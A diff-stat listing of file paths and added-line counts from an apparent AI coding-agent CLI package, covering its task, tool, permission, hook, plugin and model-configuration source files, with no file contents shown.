- package/src/state/selectors.ts +76 -0
- package/src/state/store.ts +34 -0
- package/src/state/teammateViewHelpers.ts +141 -0
- package/src/tasks/DreamTask/DreamTask.ts +157 -0
- package/src/tasks/InProcessTeammateTask/InProcessTeammateTask.tsx +126 -0
- package/src/tasks/InProcessTeammateTask/types.ts +121 -0
- package/src/tasks/LocalAgentTask/LocalAgentTask.tsx +683 -0
- package/src/tasks/LocalMainSessionTask.ts +479 -0
- package/src/tasks/LocalShellTask/LocalShellTask.tsx +523 -0
- package/src/tasks/LocalShellTask/guards.ts +41 -0
- package/src/tasks/LocalShellTask/killShellTasks.ts +76 -0
- package/src/tasks/RemoteAgentTask/RemoteAgentTask.tsx +856 -0
- package/src/tasks/pillLabel.ts +82 -0
- package/src/tasks/stopTask.ts +100 -0
- package/src/tasks/types.ts +46 -0
- package/src/tasks.ts +39 -0
- package/src/tools/AgentTool/AgentTool.tsx +1398 -0
- package/src/tools/AgentTool/UI.tsx +872 -0
- package/src/tools/AgentTool/agentColorManager.ts +66 -0
- package/src/tools/AgentTool/agentDisplay.ts +104 -0
- package/src/tools/AgentTool/agentMemory.ts +177 -0
- package/src/tools/AgentTool/agentMemorySnapshot.ts +197 -0
- package/src/tools/AgentTool/agentToolUtils.ts +686 -0
- package/src/tools/AgentTool/built-in/claudeCodeGuideAgent.ts +205 -0
- package/src/tools/AgentTool/built-in/exploreAgent.ts +83 -0
- package/src/tools/AgentTool/built-in/generalPurposeAgent.ts +34 -0
- package/src/tools/AgentTool/built-in/planAgent.ts +92 -0
- package/src/tools/AgentTool/built-in/statuslineSetup.ts +144 -0
- package/src/tools/AgentTool/built-in/verificationAgent.ts +152 -0
- package/src/tools/AgentTool/builtInAgents.ts +72 -0
- package/src/tools/AgentTool/constants.ts +12 -0
- package/src/tools/AgentTool/forkSubagent.ts +210 -0
- package/src/tools/AgentTool/loadAgentsDir.ts +755 -0
- package/src/tools/AgentTool/prompt.ts +287 -0
- package/src/tools/AgentTool/resumeAgent.ts +265 -0
- package/src/tools/AgentTool/runAgent.ts +973 -0
- package/src/tools/AskUserQuestionTool/AskUserQuestionTool.tsx +266 -0
- package/src/tools/AskUserQuestionTool/prompt.ts +44 -0
- package/src/tools/BashTool/BashTool.tsx +1144 -0
- package/src/tools/BashTool/BashToolResultMessage.tsx +191 -0
- package/src/tools/BashTool/UI.tsx +185 -0
- package/src/tools/BashTool/bashCommandHelpers.ts +265 -0
- package/src/tools/BashTool/bashPermissions.ts +2621 -0
- package/src/tools/BashTool/bashSecurity.ts +2592 -0
- package/src/tools/BashTool/commandSemantics.ts +140 -0
- package/src/tools/BashTool/commentLabel.ts +13 -0
- package/src/tools/BashTool/destructiveCommandWarning.ts +102 -0
- package/src/tools/BashTool/modeValidation.ts +115 -0
- package/src/tools/BashTool/pathValidation.ts +1303 -0
- package/src/tools/BashTool/prompt.ts +369 -0
- package/src/tools/BashTool/readOnlyValidation.ts +1990 -0
- package/src/tools/BashTool/sedEditParser.ts +322 -0
- package/src/tools/BashTool/sedValidation.ts +684 -0
- package/src/tools/BashTool/shouldUseSandbox.ts +153 -0
- package/src/tools/BashTool/toolName.ts +2 -0
- package/src/tools/BashTool/utils.ts +223 -0
- package/src/tools/BriefTool/BriefTool.ts +204 -0
- package/src/tools/BriefTool/UI.tsx +101 -0
- package/src/tools/BriefTool/attachments.ts +110 -0
- package/src/tools/BriefTool/prompt.ts +22 -0
- package/src/tools/BriefTool/upload.ts +174 -0
- package/src/tools/ConfigTool/ConfigTool.ts +467 -0
- package/src/tools/ConfigTool/UI.tsx +38 -0
- package/src/tools/ConfigTool/constants.ts +1 -0
- package/src/tools/ConfigTool/prompt.ts +93 -0
- package/src/tools/ConfigTool/supportedSettings.ts +211 -0
- package/src/tools/EnterPlanModeTool/EnterPlanModeTool.ts +126 -0
- package/src/tools/EnterPlanModeTool/UI.tsx +33 -0
- package/src/tools/EnterPlanModeTool/constants.ts +1 -0
- package/src/tools/EnterPlanModeTool/prompt.ts +170 -0
- package/src/tools/EnterWorktreeTool/EnterWorktreeTool.ts +127 -0
- package/src/tools/EnterWorktreeTool/UI.tsx +20 -0
- package/src/tools/EnterWorktreeTool/constants.ts +1 -0
- package/src/tools/EnterWorktreeTool/prompt.ts +30 -0
- package/src/tools/ExitPlanModeTool/ExitPlanModeV2Tool.ts +493 -0
- package/src/tools/ExitPlanModeTool/UI.tsx +82 -0
- package/src/tools/ExitPlanModeTool/constants.ts +2 -0
- package/src/tools/ExitPlanModeTool/prompt.ts +29 -0
- package/src/tools/ExitWorktreeTool/ExitWorktreeTool.ts +329 -0
- package/src/tools/ExitWorktreeTool/UI.tsx +25 -0
- package/src/tools/ExitWorktreeTool/constants.ts +1 -0
- package/src/tools/ExitWorktreeTool/prompt.ts +32 -0
- package/src/tools/FileEditTool/FileEditTool.ts +625 -0
- package/src/tools/FileEditTool/UI.tsx +289 -0
- package/src/tools/FileEditTool/constants.ts +11 -0
- package/src/tools/FileEditTool/prompt.ts +28 -0
- package/src/tools/FileEditTool/types.ts +85 -0
- package/src/tools/FileEditTool/utils.ts +775 -0
- package/src/tools/FileReadTool/FileReadTool.ts +1183 -0
- package/src/tools/FileReadTool/UI.tsx +185 -0
- package/src/tools/FileReadTool/imageProcessor.ts +94 -0
- package/src/tools/FileReadTool/limits.ts +92 -0
- package/src/tools/FileReadTool/prompt.ts +49 -0
- package/src/tools/FileWriteTool/FileWriteTool.ts +434 -0
- package/src/tools/FileWriteTool/UI.tsx +405 -0
- package/src/tools/FileWriteTool/prompt.ts +18 -0
- package/src/tools/GlobTool/GlobTool.ts +198 -0
- package/src/tools/GlobTool/UI.tsx +63 -0
- package/src/tools/GlobTool/prompt.ts +7 -0
- package/src/tools/GrepTool/GrepTool.ts +577 -0
- package/src/tools/GrepTool/UI.tsx +201 -0
- package/src/tools/GrepTool/prompt.ts +18 -0
- package/src/tools/LSPTool/LSPTool.ts +860 -0
- package/src/tools/LSPTool/UI.tsx +228 -0
- package/src/tools/LSPTool/formatters.ts +592 -0
- package/src/tools/LSPTool/prompt.ts +21 -0
- package/src/tools/LSPTool/schemas.ts +215 -0
- package/src/tools/LSPTool/symbolContext.ts +90 -0
- package/src/tools/ListMcpResourcesTool/ListMcpResourcesTool.ts +123 -0
- package/src/tools/ListMcpResourcesTool/UI.tsx +29 -0
- package/src/tools/ListMcpResourcesTool/prompt.ts +20 -0
- package/src/tools/MCPTool/MCPTool.ts +77 -0
- package/src/tools/MCPTool/UI.tsx +403 -0
- package/src/tools/MCPTool/classifyForCollapse.ts +604 -0
- package/src/tools/MCPTool/prompt.ts +3 -0
- package/src/tools/McpAuthTool/McpAuthTool.ts +215 -0
- package/src/tools/NotebookEditTool/NotebookEditTool.ts +490 -0
- package/src/tools/NotebookEditTool/UI.tsx +93 -0
- package/src/tools/NotebookEditTool/constants.ts +2 -0
- package/src/tools/NotebookEditTool/prompt.ts +3 -0
- package/src/tools/PowerShellTool/PowerShellTool.tsx +1001 -0
- package/src/tools/PowerShellTool/UI.tsx +131 -0
- package/src/tools/PowerShellTool/clmTypes.ts +211 -0
- package/src/tools/PowerShellTool/commandSemantics.ts +142 -0
- package/src/tools/PowerShellTool/commonParameters.ts +30 -0
- package/src/tools/PowerShellTool/destructiveCommandWarning.ts +109 -0
- package/src/tools/PowerShellTool/gitSafety.ts +176 -0
- package/src/tools/PowerShellTool/modeValidation.ts +404 -0
- package/src/tools/PowerShellTool/pathValidation.ts +2049 -0
- package/src/tools/PowerShellTool/powershellPermissions.ts +1648 -0
- package/src/tools/PowerShellTool/powershellSecurity.ts +1090 -0
- package/src/tools/PowerShellTool/prompt.ts +145 -0
- package/src/tools/PowerShellTool/readOnlyValidation.ts +1823 -0
- package/src/tools/PowerShellTool/toolName.ts +2 -0
- package/src/tools/REPLTool/constants.ts +46 -0
- package/src/tools/REPLTool/primitiveTools.ts +39 -0
- package/src/tools/ReadMcpResourceTool/ReadMcpResourceTool.ts +158 -0
- package/src/tools/ReadMcpResourceTool/UI.tsx +37 -0
- package/src/tools/ReadMcpResourceTool/prompt.ts +16 -0
- package/src/tools/RemoteTriggerTool/RemoteTriggerTool.ts +161 -0
- package/src/tools/RemoteTriggerTool/UI.tsx +17 -0
- package/src/tools/RemoteTriggerTool/prompt.ts +15 -0
- package/src/tools/ScheduleCronTool/CronCreateTool.ts +157 -0
- package/src/tools/ScheduleCronTool/CronDeleteTool.ts +95 -0
- package/src/tools/ScheduleCronTool/CronListTool.ts +97 -0
- package/src/tools/ScheduleCronTool/UI.tsx +60 -0
- package/src/tools/ScheduleCronTool/prompt.ts +135 -0
- package/src/tools/SendMessageTool/SendMessageTool.ts +917 -0
- package/src/tools/SendMessageTool/UI.tsx +31 -0
- package/src/tools/SendMessageTool/constants.ts +1 -0
- package/src/tools/SendMessageTool/prompt.ts +49 -0
- package/src/tools/SkillTool/SkillTool.ts +1108 -0
- package/src/tools/SkillTool/UI.tsx +128 -0
- package/src/tools/SkillTool/constants.ts +1 -0
- package/src/tools/SkillTool/prompt.ts +241 -0
- package/src/tools/SleepTool/prompt.ts +17 -0
- package/src/tools/SyntheticOutputTool/SyntheticOutputTool.ts +163 -0
- package/src/tools/TaskCreateTool/TaskCreateTool.ts +138 -0
- package/src/tools/TaskCreateTool/constants.ts +1 -0
- package/src/tools/TaskCreateTool/prompt.ts +56 -0
- package/src/tools/TaskGetTool/TaskGetTool.ts +128 -0
- package/src/tools/TaskGetTool/constants.ts +1 -0
- package/src/tools/TaskGetTool/prompt.ts +24 -0
- package/src/tools/TaskListTool/TaskListTool.ts +116 -0
- package/src/tools/TaskListTool/constants.ts +1 -0
- package/src/tools/TaskListTool/prompt.ts +49 -0
- package/src/tools/TaskOutputTool/TaskOutputTool.tsx +584 -0
- package/src/tools/TaskOutputTool/constants.ts +1 -0
- package/src/tools/TaskStopTool/TaskStopTool.ts +131 -0
- package/src/tools/TaskStopTool/UI.tsx +41 -0
- package/src/tools/TaskStopTool/prompt.ts +8 -0
- package/src/tools/TaskUpdateTool/TaskUpdateTool.ts +406 -0
- package/src/tools/TaskUpdateTool/constants.ts +1 -0
- package/src/tools/TaskUpdateTool/prompt.ts +77 -0
- package/src/tools/TeamCreateTool/TeamCreateTool.ts +240 -0
- package/src/tools/TeamCreateTool/UI.tsx +6 -0
- package/src/tools/TeamCreateTool/constants.ts +1 -0
- package/src/tools/TeamCreateTool/prompt.ts +113 -0
- package/src/tools/TeamDeleteTool/TeamDeleteTool.ts +139 -0
- package/src/tools/TeamDeleteTool/UI.tsx +20 -0
- package/src/tools/TeamDeleteTool/constants.ts +1 -0
- package/src/tools/TeamDeleteTool/prompt.ts +16 -0
- package/src/tools/TodoWriteTool/TodoWriteTool.ts +115 -0
- package/src/tools/TodoWriteTool/constants.ts +1 -0
- package/src/tools/TodoWriteTool/prompt.ts +184 -0
- package/src/tools/ToolSearchTool/ToolSearchTool.ts +471 -0
- package/src/tools/ToolSearchTool/constants.ts +1 -0
- package/src/tools/ToolSearchTool/prompt.ts +121 -0
- package/src/tools/TungstenTool/TungstenTool.js +2 -0
- package/src/tools/TungstenTool/TungstenTool.ts +1 -0
- package/src/tools/WebFetchTool/UI.tsx +72 -0
- package/src/tools/WebFetchTool/WebFetchTool.ts +318 -0
- package/src/tools/WebFetchTool/preapproved.ts +166 -0
- package/src/tools/WebFetchTool/prompt.ts +46 -0
- package/src/tools/WebFetchTool/utils.ts +530 -0
- package/src/tools/WebSearchTool/UI.tsx +101 -0
- package/src/tools/WebSearchTool/WebSearchTool.ts +435 -0
- package/src/tools/WebSearchTool/prompt.ts +34 -0
- package/src/tools/shared/gitOperationTracking.ts +277 -0
- package/src/tools/shared/spawnMultiAgent.ts +1093 -0
- package/src/tools/testing/TestingPermissionTool.tsx +74 -0
- package/src/tools/utils.ts +40 -0
- package/src/tools.ts +389 -0
- package/src/types/command.ts +216 -0
- package/src/types/connectorText.js +5 -0
- package/src/types/connectorText.ts +1 -0
- package/src/types/generated/events_mono/claude_code/v1/claude_code_internal_event.ts +865 -0
- package/src/types/generated/events_mono/common/v1/auth.ts +100 -0
- package/src/types/generated/events_mono/growthbook/v1/growthbook_experiment_event.ts +223 -0
- package/src/types/generated/google/protobuf/timestamp.ts +187 -0
- package/src/types/hooks.ts +290 -0
- package/src/types/ids.ts +44 -0
- package/src/types/logs.ts +330 -0
- package/src/types/permissions.ts +441 -0
- package/src/types/plugin.ts +363 -0
- package/src/types/textInputTypes.ts +387 -0
- package/src/upstreamproxy/relay.ts +455 -0
- package/src/upstreamproxy/upstreamproxy.ts +285 -0
- package/src/utils/CircularBuffer.ts +84 -0
- package/src/utils/Cursor.ts +1530 -0
- package/src/utils/QueryGuard.ts +121 -0
- package/src/utils/Shell.ts +474 -0
- package/src/utils/ShellCommand.ts +465 -0
- package/src/utils/abortController.ts +99 -0
- package/src/utils/activityManager.ts +164 -0
- package/src/utils/advisor.ts +145 -0
- package/src/utils/agentContext.ts +178 -0
- package/src/utils/agentId.ts +99 -0
- package/src/utils/agentSwarmsEnabled.ts +44 -0
- package/src/utils/agenticSessionSearch.ts +307 -0
- package/src/utils/analyzeContext.ts +1382 -0
- package/src/utils/ansiToPng.ts +334 -0
- package/src/utils/ansiToSvg.ts +272 -0
- package/src/utils/api.ts +718 -0
- package/src/utils/apiPreconnect.ts +72 -0
- package/src/utils/appleTerminalBackup.ts +124 -0
- package/src/utils/argumentSubstitution.ts +145 -0
- package/src/utils/array.ts +13 -0
- package/src/utils/asciicast.ts +239 -0
- package/src/utils/attachments.ts +3997 -0
- package/src/utils/attribution.ts +393 -0
- package/src/utils/auth.ts +2007 -0
- package/src/utils/authFileDescriptor.ts +196 -0
- package/src/utils/authPortable.ts +19 -0
- package/src/utils/autoModeDenials.ts +26 -0
- package/src/utils/autoRunIssue.tsx +122 -0
- package/src/utils/autoUpdater.ts +562 -0
- package/src/utils/aws.ts +74 -0
- package/src/utils/awsAuthStatusManager.ts +81 -0
- package/src/utils/background/remote/preconditions.ts +235 -0
- package/src/utils/background/remote/remoteSession.ts +98 -0
- package/src/utils/backgroundHousekeeping.ts +94 -0
- package/src/utils/bash/ParsedCommand.ts +318 -0
- package/src/utils/bash/ShellSnapshot.ts +582 -0
- package/src/utils/bash/ast.ts +2679 -0
- package/src/utils/bash/bashParser.ts +4436 -0
- package/src/utils/bash/bashPipeCommand.ts +294 -0
- package/src/utils/bash/commands.ts +1339 -0
- package/src/utils/bash/heredoc.ts +733 -0
- package/src/utils/bash/parser.ts +230 -0
- package/src/utils/bash/prefix.ts +204 -0
- package/src/utils/bash/registry.ts +53 -0
- package/src/utils/bash/shellCompletion.ts +259 -0
- package/src/utils/bash/shellPrefix.ts +28 -0
- package/src/utils/bash/shellQuote.ts +304 -0
- package/src/utils/bash/shellQuoting.ts +128 -0
- package/src/utils/bash/specs/alias.ts +14 -0
- package/src/utils/bash/specs/index.ts +18 -0
- package/src/utils/bash/specs/nohup.ts +13 -0
- package/src/utils/bash/specs/pyright.ts +91 -0
- package/src/utils/bash/specs/sleep.ts +13 -0
- package/src/utils/bash/specs/srun.ts +31 -0
- package/src/utils/bash/specs/time.ts +13 -0
- package/src/utils/bash/specs/timeout.ts +20 -0
- package/src/utils/bash/treeSitterAnalysis.ts +506 -0
- package/src/utils/betas.ts +438 -0
- package/src/utils/billing.ts +78 -0
- package/src/utils/binaryCheck.ts +53 -0
- package/src/utils/browser.ts +68 -0
- package/src/utils/bufferedWriter.ts +100 -0
- package/src/utils/bundledMode.ts +22 -0
- package/src/utils/caCerts.ts +115 -0
- package/src/utils/caCertsConfig.ts +88 -0
- package/src/utils/cachePaths.ts +38 -0
- package/src/utils/classifierApprovals.ts +88 -0
- package/src/utils/classifierApprovalsHook.ts +17 -0
- package/src/utils/claudeCodeHints.ts +193 -0
- package/src/utils/claudeDesktop.ts +152 -0
- package/src/utils/claudeInChrome/chromeNativeHost.ts +527 -0
- package/src/utils/claudeInChrome/common.ts +540 -0
- package/src/utils/claudeInChrome/mcpServer.ts +293 -0
- package/src/utils/claudeInChrome/prompt.ts +83 -0
- package/src/utils/claudeInChrome/setup.ts +400 -0
- package/src/utils/claudeInChrome/setupPortable.ts +233 -0
- package/src/utils/claudeInChrome/toolRendering.tsx +262 -0
- package/src/utils/claudemd.ts +1479 -0
- package/src/utils/cleanup.ts +602 -0
- package/src/utils/cleanupRegistry.ts +25 -0
- package/src/utils/cliArgs.ts +60 -0
- package/src/utils/cliHighlight.ts +54 -0
- package/src/utils/codeIndexing.ts +206 -0
- package/src/utils/collapseBackgroundBashNotifications.ts +84 -0
- package/src/utils/collapseHookSummaries.ts +59 -0
- package/src/utils/collapseReadSearch.ts +1109 -0
- package/src/utils/collapseTeammateShutdowns.ts +55 -0
- package/src/utils/combinedAbortSignal.ts +47 -0
- package/src/utils/commandLifecycle.ts +21 -0
- package/src/utils/commitAttribution.ts +961 -0
- package/src/utils/completionCache.ts +166 -0
- package/src/utils/computerUse/appNames.ts +196 -0
- package/src/utils/computerUse/cleanup.ts +86 -0
- package/src/utils/computerUse/common.ts +61 -0
- package/src/utils/computerUse/computerUseLock.ts +215 -0
- package/src/utils/computerUse/drainRunLoop.ts +79 -0
- package/src/utils/computerUse/escHotkey.ts +54 -0
- package/src/utils/computerUse/executor.ts +658 -0
- package/src/utils/computerUse/gates.ts +72 -0
- package/src/utils/computerUse/hostAdapter.ts +69 -0
- package/src/utils/computerUse/inputLoader.ts +30 -0
- package/src/utils/computerUse/mcpServer.ts +106 -0
- package/src/utils/computerUse/setup.ts +53 -0
- package/src/utils/computerUse/swiftLoader.ts +23 -0
- package/src/utils/computerUse/toolRendering.tsx +125 -0
- package/src/utils/computerUse/wrapper.tsx +336 -0
- package/src/utils/concurrentSessions.ts +204 -0
- package/src/utils/config.ts +1817 -0
- package/src/utils/configConstants.ts +21 -0
- package/src/utils/contentArray.ts +51 -0
- package/src/utils/context.ts +221 -0
- package/src/utils/contextAnalysis.ts +272 -0
- package/src/utils/contextSuggestions.ts +235 -0
- package/src/utils/controlMessageCompat.ts +32 -0
- package/src/utils/conversationRecovery.ts +597 -0
- package/src/utils/cron.ts +308 -0
- package/src/utils/cronJitterConfig.ts +75 -0
- package/src/utils/cronScheduler.ts +565 -0
- package/src/utils/cronTasks.ts +458 -0
- package/src/utils/cronTasksLock.ts +195 -0
- package/src/utils/crossProjectResume.ts +75 -0
- package/src/utils/crypto.ts +13 -0
- package/src/utils/cwd.ts +32 -0
- package/src/utils/debug.ts +268 -0
- package/src/utils/debugFilter.ts +157 -0
- package/src/utils/deepLink/banner.ts +123 -0
- package/src/utils/deepLink/parseDeepLink.ts +170 -0
- package/src/utils/deepLink/protocolHandler.ts +136 -0
- package/src/utils/deepLink/registerProtocol.ts +348 -0
- package/src/utils/deepLink/terminalLauncher.ts +557 -0
- package/src/utils/deepLink/terminalPreference.ts +54 -0
- package/src/utils/desktopDeepLink.ts +236 -0
- package/src/utils/detectRepository.ts +178 -0
- package/src/utils/diagLogs.ts +94 -0
- package/src/utils/diff.ts +177 -0
- package/src/utils/directMemberMessage.ts +69 -0
- package/src/utils/displayTags.ts +51 -0
- package/src/utils/doctorContextWarnings.ts +265 -0
- package/src/utils/doctorDiagnostic.ts +625 -0
- package/src/utils/dxt/helpers.ts +88 -0
- package/src/utils/dxt/zip.ts +226 -0
- package/src/utils/earlyInput.ts +191 -0
- package/src/utils/editor.ts +183 -0
- package/src/utils/effort.ts +329 -0
- package/src/utils/embeddedTools.ts +29 -0
- package/src/utils/env.ts +347 -0
- package/src/utils/envDynamic.ts +151 -0
- package/src/utils/envUtils.ts +183 -0
- package/src/utils/envValidation.ts +38 -0
- package/src/utils/errorLogSink.ts +235 -0
- package/src/utils/errors.ts +238 -0
- package/src/utils/exampleCommands.ts +184 -0
- package/src/utils/execFileNoThrow.ts +150 -0
- package/src/utils/execFileNoThrowPortable.ts +89 -0
- package/src/utils/execSyncWrapper.ts +38 -0
- package/src/utils/exportRenderer.tsx +98 -0
- package/src/utils/extraUsage.ts +23 -0
- package/src/utils/fastMode.ts +532 -0
- package/src/utils/file.ts +584 -0
- package/src/utils/fileHistory.ts +1115 -0
- package/src/utils/fileOperationAnalytics.ts +71 -0
- package/src/utils/filePersistence/filePersistence.ts +287 -0
- package/src/utils/filePersistence/outputsScanner.ts +126 -0
- package/src/utils/fileRead.ts +102 -0
- package/src/utils/fileReadCache.ts +96 -0
- package/src/utils/fileStateCache.ts +142 -0
- package/src/utils/findExecutable.ts +17 -0
- package/src/utils/fingerprint.ts +76 -0
- package/src/utils/forkedAgent.ts +689 -0
- package/src/utils/format.ts +308 -0
- package/src/utils/formatBriefTimestamp.ts +81 -0
- package/src/utils/fpsTracker.ts +47 -0
- package/src/utils/frontmatterParser.ts +370 -0
- package/src/utils/fsOperations.ts +770 -0
- package/src/utils/fullscreen.ts +202 -0
- package/src/utils/generatedFiles.ts +136 -0
- package/src/utils/generators.ts +88 -0
- package/src/utils/genericProcessUtils.ts +184 -0
- package/src/utils/getWorktreePaths.ts +70 -0
- package/src/utils/getWorktreePathsPortable.ts +27 -0
- package/src/utils/ghPrStatus.ts +106 -0
- package/src/utils/git/gitConfigParser.ts +277 -0
- package/src/utils/git/gitFilesystem.ts +699 -0
- package/src/utils/git/gitignore.ts +99 -0
- package/src/utils/git.ts +926 -0
- package/src/utils/gitDiff.ts +532 -0
- package/src/utils/gitSettings.ts +18 -0
- package/src/utils/github/ghAuthStatus.ts +29 -0
- package/src/utils/githubRepoPathMapping.ts +162 -0
- package/src/utils/glob.ts +130 -0
- package/src/utils/gracefulShutdown.ts +529 -0
- package/src/utils/groupToolUses.ts +182 -0
- package/src/utils/handlePromptSubmit.ts +610 -0
- package/src/utils/hash.ts +46 -0
- package/src/utils/headlessProfiler.ts +178 -0
- package/src/utils/heapDumpService.ts +303 -0
- package/src/utils/heatmap.ts +198 -0
- package/src/utils/highlightMatch.tsx +28 -0
- package/src/utils/hooks/AsyncHookRegistry.ts +309 -0
- package/src/utils/hooks/apiQueryHookHelper.ts +141 -0
- package/src/utils/hooks/execAgentHook.ts +339 -0
- package/src/utils/hooks/execHttpHook.ts +242 -0
- package/src/utils/hooks/execPromptHook.ts +211 -0
- package/src/utils/hooks/fileChangedWatcher.ts +191 -0
- package/src/utils/hooks/hookEvents.ts +192 -0
- package/src/utils/hooks/hookHelpers.ts +83 -0
- package/src/utils/hooks/hooksConfigManager.ts +400 -0
- package/src/utils/hooks/hooksConfigSnapshot.ts +133 -0
- package/src/utils/hooks/hooksSettings.ts +271 -0
- package/src/utils/hooks/postSamplingHooks.ts +70 -0
- package/src/utils/hooks/registerFrontmatterHooks.ts +67 -0
- package/src/utils/hooks/registerSkillHooks.ts +64 -0
- package/src/utils/hooks/sessionHooks.ts +447 -0
- package/src/utils/hooks/skillImprovement.ts +267 -0
- package/src/utils/hooks/ssrfGuard.ts +294 -0
- package/src/utils/hooks.ts +5022 -0
- package/src/utils/horizontalScroll.ts +137 -0
- package/src/utils/http.ts +136 -0
- package/src/utils/hyperlink.ts +39 -0
- package/src/utils/iTermBackup.ts +73 -0
- package/src/utils/ide.ts +1494 -0
- package/src/utils/idePathConversion.ts +90 -0
- package/src/utils/idleTimeout.ts +53 -0
- package/src/utils/imagePaste.ts +416 -0
- package/src/utils/imageResizer.ts +880 -0
- package/src/utils/imageStore.ts +167 -0
- package/src/utils/imageValidation.ts +104 -0
- package/src/utils/immediateCommand.ts +15 -0
- package/src/utils/inProcessTeammateHelpers.ts +102 -0
- package/src/utils/ink.ts +26 -0
- package/src/utils/intl.ts +94 -0
- package/src/utils/jetbrains.ts +191 -0
- package/src/utils/json.ts +277 -0
- package/src/utils/jsonRead.ts +16 -0
- package/src/utils/keyboardShortcuts.ts +14 -0
- package/src/utils/lazySchema.ts +8 -0
- package/src/utils/listSessionsImpl.ts +454 -0
- package/src/utils/localInstaller.ts +162 -0
- package/src/utils/lockfile.ts +43 -0
- package/src/utils/log.ts +362 -0
- package/src/utils/logoV2Utils.ts +350 -0
- package/src/utils/mailbox.ts +73 -0
- package/src/utils/managedEnv.ts +199 -0
- package/src/utils/managedEnvConstants.ts +191 -0
- package/src/utils/markdown.ts +381 -0
- package/src/utils/markdownConfigLoader.ts +600 -0
- package/src/utils/mcp/dateTimeParser.ts +121 -0
- package/src/utils/mcp/elicitationValidation.ts +336 -0
- package/src/utils/mcpInstructionsDelta.ts +130 -0
- package/src/utils/mcpOutputStorage.ts +189 -0
- package/src/utils/mcpValidation.ts +208 -0
- package/src/utils/mcpWebSocketTransport.ts +200 -0
- package/src/utils/memoize.ts +269 -0
- package/src/utils/memory/types.ts +12 -0
- package/src/utils/memory/versions.ts +8 -0
- package/src/utils/memoryFileDetection.ts +289 -0
- package/src/utils/messagePredicates.ts +8 -0
- package/src/utils/messageQueueManager.ts +547 -0
- package/src/utils/messages/mappers.ts +290 -0
- package/src/utils/messages/systemInit.ts +96 -0
- package/src/utils/messages.ts +5512 -0
- package/src/utils/model/agent.ts +157 -0
- package/src/utils/model/aliases.ts +25 -0
- package/src/utils/model/antModels.ts +64 -0
- package/src/utils/model/bedrock.ts +265 -0
- package/src/utils/model/check1mAccess.ts +72 -0
- package/src/utils/model/configs.ts +118 -0
- package/src/utils/model/contextWindowUpgradeCheck.ts +47 -0
- package/src/utils/model/deprecation.ts +101 -0
- package/src/utils/model/model.ts +634 -0
- package/src/utils/model/modelAllowlist.ts +170 -0
- package/src/utils/model/modelCapabilities.ts +118 -0
- package/src/utils/model/modelOptions.ts +540 -0
- package/src/utils/model/modelStrings.ts +166 -0
- package/src/utils/model/modelSupportOverrides.ts +50 -0
- package/src/utils/model/providers.ts +46 -0
- package/src/utils/model/validateModel.ts +159 -0
- package/src/utils/modelCost.ts +235 -0
- package/src/utils/modifiers.ts +36 -0
- package/src/utils/mtls.ts +179 -0
- package/src/utils/nativeInstaller/download.ts +523 -0
- package/src/utils/nativeInstaller/index.ts +18 -0
- package/src/utils/nativeInstaller/installer.ts +1708 -0
- package/src/utils/nativeInstaller/packageManagers.ts +336 -0
- package/src/utils/nativeInstaller/pidLock.ts +433 -0
- package/src/utils/notebook.ts +224 -0
- package/src/utils/objectGroupBy.ts +18 -0
- package/src/utils/pasteStore.ts +104 -0
- package/src/utils/path.ts +155 -0
- package/src/utils/pdf.ts +300 -0
- package/src/utils/pdfUtils.ts +70 -0
- package/src/utils/peerAddress.ts +21 -0
- package/src/utils/permissions/PermissionMode.ts +141 -0
- package/src/utils/permissions/PermissionPromptToolResultSchema.ts +127 -0
- package/src/utils/permissions/PermissionResult.ts +35 -0
- package/src/utils/permissions/PermissionRule.ts +40 -0
- package/src/utils/permissions/PermissionUpdate.ts +389 -0
- package/src/utils/permissions/PermissionUpdateSchema.ts +78 -0
- package/src/utils/permissions/autoModeState.ts +39 -0
- package/src/utils/permissions/bashClassifier.ts +61 -0
- package/src/utils/permissions/bypassPermissionsKillswitch.ts +155 -0
- package/src/utils/permissions/classifierDecision.ts +98 -0
- package/src/utils/permissions/classifierShared.ts +39 -0
- package/src/utils/permissions/dangerousPatterns.ts +80 -0
- package/src/utils/permissions/denialTracking.ts +45 -0
- package/src/utils/permissions/filesystem.ts +1777 -0
- package/src/utils/permissions/getNextPermissionMode.ts +101 -0
- package/src/utils/permissions/pathValidation.ts +485 -0
- package/src/utils/permissions/permissionExplainer.ts +250 -0
- package/src/utils/permissions/permissionRuleParser.ts +198 -0
- package/src/utils/permissions/permissionSetup.ts +1532 -0
- package/src/utils/permissions/permissions.ts +1486 -0
- package/src/utils/permissions/permissionsLoader.ts +296 -0
- package/src/utils/permissions/shadowedRuleDetection.ts +234 -0
- package/src/utils/permissions/shellRuleMatching.ts +228 -0
- package/src/utils/permissions/yoloClassifier.ts +1495 -0
- package/src/utils/planModeV2.ts +95 -0
- package/src/utils/plans.ts +397 -0
- package/src/utils/platform.ts +150 -0
- package/src/utils/plugins/addDirPluginSettings.ts +71 -0
- package/src/utils/plugins/cacheUtils.ts +196 -0
- package/src/utils/plugins/dependencyResolver.ts +305 -0
- package/src/utils/plugins/fetchTelemetry.ts +135 -0
- package/src/utils/plugins/gitAvailability.ts +69 -0
- package/src/utils/plugins/headlessPluginInstall.ts +174 -0
- package/src/utils/plugins/hintRecommendation.ts +164 -0
- package/src/utils/plugins/installCounts.ts +292 -0
- package/src/utils/plugins/installedPluginsManager.ts +1268 -0
- package/src/utils/plugins/loadPluginAgents.ts +348 -0
- package/src/utils/plugins/loadPluginCommands.ts +946 -0
- package/src/utils/plugins/loadPluginHooks.ts +287 -0
- package/src/utils/plugins/loadPluginOutputStyles.ts +178 -0
- package/src/utils/plugins/lspPluginIntegration.ts +387 -0
- package/src/utils/plugins/lspRecommendation.ts +374 -0
- package/src/utils/plugins/managedPlugins.ts +27 -0
- package/src/utils/plugins/marketplaceHelpers.ts +592 -0
- package/src/utils/plugins/marketplaceManager.ts +2643 -0
- package/src/utils/plugins/mcpPluginIntegration.ts +634 -0
- package/src/utils/plugins/mcpbHandler.ts +968 -0
- package/src/utils/plugins/officialMarketplace.ts +25 -0
- package/src/utils/plugins/officialMarketplaceGcs.ts +216 -0
- package/src/utils/plugins/officialMarketplaceStartupCheck.ts +439 -0
- package/src/utils/plugins/orphanedPluginFilter.ts +114 -0
- package/src/utils/plugins/parseMarketplaceInput.ts +162 -0
- package/src/utils/plugins/performStartupChecks.tsx +70 -0
- package/src/utils/plugins/pluginAutoupdate.ts +284 -0
- package/src/utils/plugins/pluginBlocklist.ts +127 -0
- package/src/utils/plugins/pluginDirectories.ts +178 -0
- package/src/utils/plugins/pluginFlagging.ts +208 -0
- package/src/utils/plugins/pluginIdentifier.ts +123 -0
